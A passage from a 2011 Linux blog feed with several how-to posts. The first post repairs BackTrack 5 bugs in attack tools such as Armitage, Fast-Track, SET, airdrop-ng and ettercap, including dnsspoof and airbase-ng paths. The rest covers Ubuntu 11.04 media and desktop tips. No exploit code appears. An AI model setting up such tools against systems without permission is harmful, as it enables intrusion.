May 10, 2011 and it comes with Gnome and KDE as well as 32-bit, 64-bit and ARM versions.&lt;br /&gt;
&lt;br /&gt;
The following solutions are summarized from BackTrack 5 forum as at May 21, 2011 (GMT +8).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #1 : Quick fix for scan modules not working in Armitage&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /pentest/exploits/framework3/external/pcaprub/&lt;br /&gt;
ruby extconf.rb &lt;br /&gt;
make&lt;br /&gt;
make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #2 : Gnome - waiting for audio system to respond&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mkdir ~/.config/autostart&lt;br /&gt;
nano ~/.config/autostart/pulseaudio.desktop&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;[Desktop Entry]&lt;br /&gt;
Type=Application&lt;br /&gt;
Exec=/usr/bin/pulseaudio&lt;br /&gt;
Hidden=false&lt;br /&gt;
NoDisplay=false&lt;br /&gt;
X-GNOME-Autostart-enabled=true&lt;br /&gt;
Name=Pulseaudio&lt;br /&gt;
Comment=Start Pulseaudio&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #3 : Where is Fast-track on 64-bit system?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;svn co http://svn.secmaniac.com/fasttrack fasttrack/&lt;br /&gt;
cd fasttrack&lt;br /&gt;
python setup.py install&lt;br /&gt;
mv ~/fasttrack/ /pentest/exploits/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Answer "&lt;code&gt;yes&lt;/code&gt;" when asked during the captioned commands.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #4 : Fix error when building nvidia-current&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /usr/src/nvidia-current-195.36.24/nv.c&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change from :&lt;br /&gt;
&lt;code&gt;.ioctl = nv_kern_ioctl,&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To :&lt;br /&gt;
&lt;code&gt;.unlocked_ioctl = nv_kern_unlocked_ioctl,&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get update&lt;br /&gt;
apt-get upgrade&lt;br /&gt;
apt-get install nvidia-current&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
If fail, try the below :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;dkms build -m nvidia-current -v 195.36.24&lt;br /&gt;
dkms install -m nvidia-current -v 195.36.24&lt;br /&gt;
modprobe nvidia-current&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #5 : White screen of death (ATi display card)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/default/grub&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change from :&lt;br /&gt;
&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT="text splash"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To :&lt;br /&gt;
&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT="text splash radeon.modeset=0"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #6 : airdrop-ng and pylorcon&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install python-dev&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #7 : xgps on 64-bit system&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Go to the following link :&lt;br /&gt;
&lt;code&gt;http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/index.php#SWT&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Download "&lt;code&gt;Linux (x86_64/GTK 2)&lt;/code&gt;", version is 3.5.2 at the time of this writing :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/download.php?dropFile=swt-3.5.2-gtk-linux-x86_64.zip&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;unzip swt-3.5.2-gtk-linux-x86_64.zip&lt;br /&gt;
cp swt.jar /usr/share/xgpsmanager&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #8 : Gnome - Ettercap-gtk crashes while scanning for hosts&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Please refer to the following link :&lt;br /&gt;
&lt;code&gt;http://www.backtrack-linux.org/forums/backtrack-5-bugs/40556-ettercap-gtk-crashes-while-scanning-hosts.html&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #9 : SET configuration bug&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd /pentest/exploits/set/config&lt;br /&gt;
nano set_config&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change from :&lt;br /&gt;
&lt;code&gt;DNSSPOOF_PATH=/usr/sbin/dnsspoof&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To :&lt;br /&gt;
&lt;code&gt;DNSSPOOF_PATH=/usr/sbin/local/dnsspoof&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
and &lt;br /&gt;
&lt;br /&gt;
Change from :&lt;br /&gt;
&lt;code&gt;AIRBASE_NG_PATH=/pentest/wireless/aircrack-ng/src/airbase-ng&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To : &lt;br /&gt;
&lt;code&gt;AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Bug #10 : Teensy/SET&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Please refer to the following link :&lt;br /&gt;
&lt;code&gt;http://www.backtrack-linux.org/forums/backtrack-5-fixes/40484-bt5-kde-64bit-teensy-s-e-t.html&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org"&gt;BackTrack 5 site&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/downloads/"&gt;BackTrack 5 Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/wiki/index.php/Main_Page"&gt;BackTrack 5 wiki&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/forums/"&gt;BackTrack Forum&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-894202329099895471?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/894202329099895471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/894202329099895471'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-bug-fix-for-backtrack-5.html' title='HOWTO : Bug fix for Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2720719426269036365</id><published>2011-05-18T21:15:00.002+08:00</published><updated>2011-05-18T21:22:31.588+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RTHK'/><category scheme='http://www.blogger.com/atom/ns#' term='Octoshape'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Octoshape on Ubuntu 11.04 Desktop</title><content type='html'>When listen to the online radio of RTHK at &lt;code&gt;http://www.rthk.org.hk&lt;/code&gt;, you may find a "HQ" button.  This button activates a third party plugin namely &lt;a href="http://www.octoshape.com/"&gt;Octoshape&lt;/a&gt; which can deliver high quality video and audio streaming.  Now, you can enjoy this high quality radio streaming on Ubuntu 11.04.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install the plugin.  No matter you have 32-bit or 64-bit system, you can follow the commands below to install.  The plugin will be installed at your home directory.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://www.octoshape.com/files/octosetup-linux_i386.bin&lt;br /&gt;
chmod +x octosetup-linux_i386.bin&lt;br /&gt;
./octosetup-linux_i386.bin&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Make sure the client is running in the terminal (the commands below) when playback the HQ video and / or audio.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd octoshape&lt;br /&gt;
./OctoshapeClient&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Firefox and go to &lt;a href="http://www.rthk.org.hk"&gt;RTHK&lt;/a&gt; and select one of the online programme by clicking "&lt;code&gt;HQ&lt;/code&gt;" button.  Make sure the Octoshape Client is running as per Step 2.&lt;br /&gt;
&lt;br /&gt;
Now, you can enjoy the HQ video and / or audio on the website.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2720719426269036365?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2720719426269036365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2720719426269036365'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-octoshape-on-ubuntu-1104-desktop.html' title='HOWTO : Octoshape on Ubuntu 11.04 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4656328967337393959</id><published>2011-05-16T14:29:00.003+08:00</published><updated>2011-05-16T14:30:37.392+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Unity'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Unity Interface's Shortcut Keys and Mouse Tricks</title><content type='html'>&lt;b&gt;Super Key(Windows Key)&lt;/b&gt; - Opens dash.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Hold Super Key&lt;/b&gt; - Invokes Launcher.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Hold Super Key&lt;/b&gt; and hit &lt;b&gt;1&lt;/b&gt;, &lt;b&gt;2&lt;/b&gt;, &lt;b&gt;3&lt;/b&gt; etc - Open an Application from Launcher. When you hold the Super Key, specific numbers will be displayed in order above each application.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + F1&lt;/b&gt; - Put keyboard focus on the Launcher, use arrow keys to navigate, Enter launches the application, Right arrow exposes the quicklists if an application has them.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + F2&lt;/b&gt; - Opens dash in special mode to run any commands.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + A&lt;/b&gt; - Opens up application window from launcher.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + F&lt;/b&gt; - Opens up files and folders window from launcher. Both these shortcuts can be viewed by simply holding the Super Key as well.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + W&lt;/b&gt; - Spread mode, zoom out on all windows in all workspaces.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + D&lt;/b&gt; - Minimize all windows(acts as Show Desktop). Hitting it again restores them.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + T&lt;/b&gt; - Opens trash can.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Super + S&lt;/b&gt; - Expo mode (for everything), zooms out on all the workspaces and let's you manage windows.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ctrl + Alt + T&lt;/b&gt; - Launch Terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ctrl + Alt + L&lt;/b&gt; - Lock Screen.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ctrl + Alt + Left/Right/Up/Down&lt;/b&gt; - Move to new workspace.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Ctrl + Alt + Shift + Left/Right/Up/Down&lt;/b&gt; - Place window to a new workspace.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;F10&lt;/b&gt; - Open the first menu on top panel, use arrows keys to browse across the menus.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Mouse Shortcuts/Tricks for Ubuntu Unity&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
* Clicking and holding an icon and then dragging it around will allow you to reorder it on the launcher. You can also drag it off to the right of the launcher to move it around. Note that you need to make an explicit movement to the right to move the icon off the launcher before you can move it around.&lt;br /&gt;
&lt;br /&gt;
* Dragging and Dropping an icon into the trash can will remove it from the Launcher.&lt;br /&gt;
&lt;br /&gt;
* Moving and holding the cursor on the left side for a few seconds will launch Unity dock.&lt;br /&gt;
&lt;br /&gt;
* Moving the cursor to top-left corner(near Ubuntu icon) will launch Unity dock as well.&lt;br /&gt;
&lt;br /&gt;
* Scrolling the mouse wheel while over the Launcher scrolls the icons if you have too many and need to move around quickly.&lt;br /&gt;
&lt;br /&gt;
* By Scrolling the mouse wheel while over the Sound icon on top panel helps you increase or decrease system volume.&lt;br /&gt;
&lt;br /&gt;
* Middle click on an application's launcher icon - Open a new instance of the application in a new window. Very useful at times. In laptops with touchpads, hitting left/right click buttons together is akin to middle click.&lt;br /&gt;
&lt;br /&gt;
* Maximizing - Dragging a window to the top panel will maximize it.&lt;br /&gt;
&lt;br /&gt;
* Restore/Unmaximize - Dragging the top panel down OR double clicking on the top panel will do.&lt;br /&gt;
&lt;br /&gt;
* Tiling - Dragging a Window to the left/right border will auto tile it to that side of the screen. One of the highlights of new Unity experience.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;And Some Useful Window Management Shortcuts&lt;/u&gt;&lt;br /&gt;
&lt;b&gt;Alt + F10&lt;/b&gt; - Toggle between Maximize/Unmaximize current window.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + F9&lt;/b&gt; - Minimize current window.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + Tab&lt;/b&gt; - Toggle between currently open windows.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + F4&lt;/b&gt; - Closes current window.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Alt + F7&lt;/b&gt; - Moves the current window(both keyboard and mouse can be used&lt;br /&gt;
&lt;br /&gt;
By the way, you can download the captioned shortcut key wallpaper at &lt;a href="http://www.debian-inside.com/files/unity_shortcut_wallpaper.png"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4656328967337393959?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4656328967337393959'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4656328967337393959'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-unity-interfaces-shortcut-keys.html' title='HOWTO : Unity Interface&apos;s Shortcut Keys and Mouse Tricks'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4362821604103150191</id><published>2011-05-16T11:33:00.002+08:00</published><updated>2011-05-16T13:02:54.118+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Unity 2D'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Blank screen when boot up Ubuntu 11.04 Desktop</title><content type='html'>I have a very old SONY laptop and the model is PCG-TR1.  The following is the display card of the laptop :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;lspci | grep VGA&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You can boot up the Live CD or DVD and install the system properly.  It is no problem when the first boot up after the installation.  However, it will be blank screen / black screen on the second and later boot up.&lt;br /&gt;
&lt;br /&gt;
How to overcome this problem?  Yes, I can and going to tell you.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The screen will go blank and black in the second boot and later.  Don't worry, just press the following key combination.  Yes, just complete the following key combination.&lt;br /&gt;
&lt;br /&gt;
Press &lt;code&gt;ctrl+alt+F5&lt;/code&gt;, &lt;code&gt;ctrl+alt+F7&lt;/code&gt;, &lt;code&gt;ctrl+alt+F5&lt;/code&gt;, and then &lt;code&gt;ctrl+alt+F7&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, you will see the login screen again.  You should press the key combination every time when you boot up your system.&lt;br /&gt;
&lt;br /&gt;
However, the Unity 3D interface and special effect do not support but classic is working fine.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To use Unity 2D interface instead of Gnome classic interface.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get install unity-2d&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;Unity 2D&lt;/code&gt;" at the bottom of the screen when login to the system after the next boot up.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Some laptops that equipped with other model of Intel integrated display cards may encounter other problems, such as blinking screen.  Someone out there suggest to update the xorg packages may solve the problems.  &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:xorg-edgers/ppa&lt;br /&gt;
sudo apt-get update&lt;br /&gt;
sudo apt-get dist-upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4362821604103150191?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4362821604103150191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4362821604103150191'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-blank-screen-when-boot-up-ubuntu.html' title='HOWTO : Blank screen when boot up Ubuntu 11.04 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4497738859786597298</id><published>2011-05-14T05:23:00.016+08:00</published><updated>2011-06-11T16:03:28.074+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PPStream'/><category scheme='http://www.blogger.com/atom/ns#' term='Totem'/><category scheme='http://www.blogger.com/atom/ns#' term='SopCast'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : SopCast and PPStream on Ubuntu 11.04 Desktop Made Easy</title><content type='html'>SopCast is online TV and PPStream is online movie of China.  Now, you can watch these online TV and movies on Totem.  This tutorial is written for any person who know Chinese.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-add-repository ppa:cnav/ppa&lt;br /&gt;
sudo apt-get update&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;SopCast :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install sopcast gst-plugins-sopcast totem-sopcast&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;PPStream :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install ppstream gst-plugins-pps totem-plugin-pps totem-pps&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Totem.  Select "&lt;code&gt;Edit&lt;/code&gt;" -- "&lt;code&gt;Plugins&lt;/code&gt;" on the menu.&lt;br /&gt;
&lt;br /&gt;
Enable "&lt;code&gt;SopCast browser&lt;/code&gt;" and "&lt;code&gt;PPStream browser&lt;/code&gt;".  &lt;br /&gt;
&lt;br /&gt;
Enable "&lt;code&gt;Show channel name in Chinese&lt;/code&gt;" at "&lt;code&gt;Setup&lt;/code&gt;" of "&lt;code&gt;SopCast&lt;/code&gt;".  This step is important if you want to use "&lt;code&gt;Step 6&lt;/code&gt;" below; otherwise, some channels cannot be shown up.&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;SopCast&lt;/code&gt;" or "&lt;code&gt;PPStream&lt;/code&gt;" at the right hand side's sidebar and enjoy it.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Enter "&lt;code&gt;about:config&lt;/code&gt;" (without quote) at the address field of Firefox.  Right click on any empty place.  Select "&lt;code&gt;Add&lt;/code&gt;", then choose "&lt;code&gt;Boolean&lt;/code&gt;".  Enter "&lt;code&gt;network.protocol-handler.expose.pps&lt;/code&gt;" (without quote) to the place provided.  Then choose "&lt;code&gt;false&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Go to &lt;code&gt;http://kan.pps.tv/&lt;/code&gt; and choose any movie and select "&lt;code&gt;Client Playback&lt;/code&gt;" (&lt;code&gt;客戶端播放&lt;/code&gt;).  Then select "&lt;code&gt;/usr/bin/totem&lt;/code&gt;" from the file system.&lt;br /&gt;
&lt;br /&gt;
The video will be playback on the Totem after clicking on the "&lt;code&gt;Client Playback&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install GMLive for SopCast channels as the channel of SopCast at Totem does not work.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;br /&gt;
sudo apt-get install gmlive&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(a) Open GMLive and select "&lt;code&gt;Tools&lt;/code&gt;" on the menu.  "&lt;code&gt;Preference&lt;/code&gt;" -- "&lt;code&gt;SopCast&lt;/code&gt;"&lt;br /&gt;
&lt;br /&gt;
Change the values as the following :&lt;br /&gt;
&lt;code&gt;Mplayer cache : 8192 Kbs&lt;br /&gt;
Boardcast URL : http://www.sopcast.com/gchlxml&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(b) Open GMLive and select "&lt;code&gt;Tools&lt;/code&gt;" on the menu.  "&lt;code&gt;Preference&lt;/code&gt;" -- "&lt;code&gt;GMLive&lt;/code&gt;"&lt;br /&gt;
&lt;br /&gt;
Disable "&lt;code&gt;PPLive support&lt;/code&gt;".&lt;br /&gt;
PPStream function does not work at GMLive.&lt;br /&gt;
&lt;br /&gt;
Football channels for example :&lt;br /&gt;
"&lt;code&gt;Vozao.com&lt;/code&gt;" and "&lt;code&gt;Sports Channel&lt;/code&gt;" on the list of SopCast.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(a) If you want to use the channel list of GMLive instead of Totem's one, you can copy it.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mv ~/.local/share/totem/plugin/sopcast/channels.xml ~/.local/share/totem/plugin/sopcast/channels.xml-original&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cp ~/.config/gmlive/sopcast.lst ~/.local/share/totem/plugin/sopcast/channels.xml&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(b) Or, if you do not want to install GMLive, you can download the channel list for SopCast official site.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;mv ~/.local/share/totem/plugin/sopcast/channels.xml ~/.local/share/totem/plugin/sopcast/channels.xml-original&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://www.sopcast.com/gchlxml&lt;br /&gt;
cp gchlxml ~/.local/share/totem/plugin/sopcast/channels.xml&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The same football channels as "&lt;code&gt;Step 5&lt;/code&gt;" are at the "&lt;code&gt;Other&lt;/code&gt;" on the right hand side of the Totem.  They are "&lt;code&gt;Sport&lt;/code&gt;" and "&lt;code&gt;Soccerhd.info&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Some channels of SopCast on Totem are not working.  However, sports channel of CCTV is working properly.  Fortunately, it can be overcame by doing the "&lt;code&gt;Step 6(a)&lt;/code&gt;" or "&lt;code&gt;Step 6(b)&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
The video playback with PPStream on Totem will not be counted at the webpage of &lt;code&gt;http://kan.pps.tv/&lt;/code&gt;.  Therefore, some of the movies cannot be watched.&lt;br /&gt;
&lt;br /&gt;
PPStream does not work on GMLive.  PPLive does not support on GMLive in this tutorial.&lt;br /&gt;
&lt;br /&gt;
** If you are using &lt;code&gt;Ubuntu Samiux Remix 11.04 r0.8.1&lt;/code&gt; or later, the captioned steps had been completed for you (but except the Firefox step).  You can use it right away.  You can download it at &lt;a href="http://www.debian-inside.com/"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;UPDATED&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Today (2011-June-11), I cannot use Totem to watch PPStream and the reason is still unknown.  However, PPStream can be (Search for the application namely PPStream by press "Super" key).  Just go to "Tool" -- "Option" -- "Select Sound device" and choose "alsa" to enable the sound of the PPStream.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4497738859786597298?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4497738859786597298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4497738859786597298'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-sopcast-and-ppstream-on-ubuntu.html' title='HOWTO : SopCast and PPStream on Ubuntu 11.04 Desktop Made Easy'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-571621514976982527</id><published>2011-05-07T10:12:00.007+08:00</published><updated>2011-05-10T10:10:55.472+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HD video'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='AMD'/><category scheme='http://www.blogger.com/atom/ns#' term='ATi'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : HD video playback on Ubuntu 11.04 Desktop</title><content type='html'>&lt;b&gt;Step 1 - Install the official driver and SMPlayer from Ubuntu :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install the official nVidia or ATi display card driver from the "Hardware drivers" from your Ubuntu 11.04 system.  Then, install SMPlayer for the video player.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
